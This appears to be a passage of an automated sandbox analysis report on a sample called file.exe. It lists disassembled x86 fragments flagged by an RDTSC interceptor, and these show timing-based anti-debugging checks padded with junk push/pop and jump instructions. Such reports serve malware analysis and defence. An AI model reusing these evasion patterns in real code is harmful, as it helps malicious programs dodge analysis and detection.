Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F045 second address: E7F049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F049 second address: E7F057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FDE70D000CEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F057 second address: E7F067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F067 second address: E7F06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F659 second address: E7F663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F663 second address: E7F6A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FDE70D000C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FDE70D000CCh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jmp 00007FDE70D000D8h 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f jc 00007FDE70D000C8h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F6A3 second address: E7F6B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jne 00007FDE71263CE6h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F9F5 second address: E7F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F9FB second address: E7F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2E220 second address: E2E241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 jmp 00007FDE70D000CEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FDE70D000FDh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FEAA second address: E0FEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0FEB0 second address: E0FEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FE6A second address: E7FE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84D2C second address: E84D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84D30 second address: E84D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84D34 second address: E84D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE70D000CCh 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A378 second address: E8A395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF7h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89116 second address: E8911C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E896F8 second address: E8970E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CECh 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FDE71263CE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8970E second address: E89718 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDE70D000C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89718 second address: E8974A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FDE71263CEEh 0x0000000f jmp 00007FDE71263CEEh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDE71263CEBh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88E33 second address: E88E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88E38 second address: E88E57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88E57 second address: E88E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89B55 second address: E89B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89B5A second address: E89B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89CDE second address: E89CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE71263CEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89E2B second address: E89E31 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89E31 second address: E89E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89E36 second address: E89E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E903A0 second address: E903BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDE71263CE6h 0x0000000a pop ebx 0x0000000b jnp 00007FDE71263CF6h 0x00000011 pushad 0x00000012 jo 00007FDE71263CE6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F1A0 second address: E8F1AA instructions: 0x00000000 rdtsc 0x00000002 je 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F1AA second address: E8F1C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46B88 second address: E46B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46B8D second address: E46BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46BAD second address: E46BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46C75 second address: E46C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46C7B second address: E46C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FDE70D000C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46FE7 second address: E46FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E46FED second address: E4700E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FDE70D000C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4700E second address: E47028 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47120 second address: E47124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E471DF second address: E471E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E471E5 second address: E47215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 4E39F814h 0x0000000f jmp 00007FDE70D000D6h 0x00000014 push CF50B7E1h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47215 second address: E4721B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4721B second address: E47226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FDE70D000C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47388 second address: E47392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FDE71263CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47447 second address: E47450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E475C9 second address: E475E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47A82 second address: E47A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47D2E second address: E47D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jng 00007FDE71263CE6h 0x0000000c pop edi 0x0000000d popad 0x0000000e nop 0x0000000f call 00007FDE71263CF8h 0x00000014 mov edx, dword ptr [ebp+122D2C1Bh] 0x0000001a pop ecx 0x0000001b lea eax, dword ptr [ebp+12486921h] 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007FDE71263CE8h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000015h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47D86 second address: E47D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47D8A second address: E47DA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47DA4 second address: E2E220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FDE70D000C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push esi 0x00000027 mov dword ptr [ebp+122D2081h], eax 0x0000002d pop edi 0x0000002e call dword ptr [ebp+122D2041h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push edx 0x00000037 jg 00007FDE70D000C6h 0x0000003d js 00007FDE70D000C6h 0x00000043 pop edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F508 second address: E8F516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F516 second address: E8F51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F676 second address: E8F68E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F68E second address: E8F6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDE70D000C6h 0x0000000a jmp 00007FDE70D000D9h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8F6B2 second address: E8F6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF5h 0x00000009 jmp 00007FDE71263CF2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FCB6 second address: E8FCBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FCBD second address: E8FCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E95332 second address: E95355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE70D000D2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E04050 second address: E04057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E94E5C second address: E94E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007FDE70D000CCh 0x0000000e jp 00007FDE70D000CAh 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FDE70D000C6h 0x00000022 jmp 00007FDE70D000D5h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E94E99 second address: E94EB8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE71263CF5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E95033 second address: E95037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9BF47 second address: E9BF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDE71263CE6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnc 00007FDE71263CEAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9BF5E second address: E9BF69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FDE70D000C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9C7F5 second address: E9C7FF instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDE71263CF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA1D3 second address: DFA1E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FDE70D000C6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA1E1 second address: DFA1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA1E7 second address: DFA1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F1D0 second address: E9F1D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F1D4 second address: E9F1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F36A second address: E9F3A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FDE71263CE6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c jmp 00007FDE71263CEFh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDE71263CF6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F3A2 second address: E9F3C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F3C3 second address: E9F3D7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDE71263CEAh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F3D7 second address: E9F3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4ED0 second address: EA4ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA4ED4 second address: EA4ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5007 second address: EA500B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4774E second address: E47758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDE70D000C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E47758 second address: E477A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jmp 00007FDE71263CF0h 0x00000010 pop edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ecx 0x00000015 popad 0x00000016 nop 0x00000017 mov edi, dword ptr [ebp+122D1DF8h] 0x0000001d mov ebx, dword ptr [ebp+12486960h] 0x00000023 mov dword ptr [ebp+122D20BAh], eax 0x00000029 movzx edi, si 0x0000002c add eax, ebx 0x0000002e jnp 00007FDE71263CECh 0x00000034 mov dword ptr [ebp+122D1CB1h], edx 0x0000003a push eax 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5195 second address: EA519B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA519B second address: EA519F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA519F second address: EA51E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FDE70D000D5h 0x0000000f push ecx 0x00000010 jmp 00007FDE70D000CCh 0x00000015 jmp 00007FDE70D000D7h 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5D6B second address: EA5D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF1h 0x00000009 jns 00007FDE71263CE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA5D86 second address: EA5D8C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEAFC second address: EAEB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEB00 second address: EAEB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FDE70D000C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEB13 second address: EAEB27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FDE71263CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FDE71263CE8h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACBDF second address: EACBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACBE4 second address: EACC1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE71263CF8h 0x00000008 jmp 00007FDE71263CF2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FDE71263CE6h 0x00000019 jmp 00007FDE71263CF2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACC1C second address: EACC20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EACC20 second address: EACC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE222 second address: EAE23D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D5h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
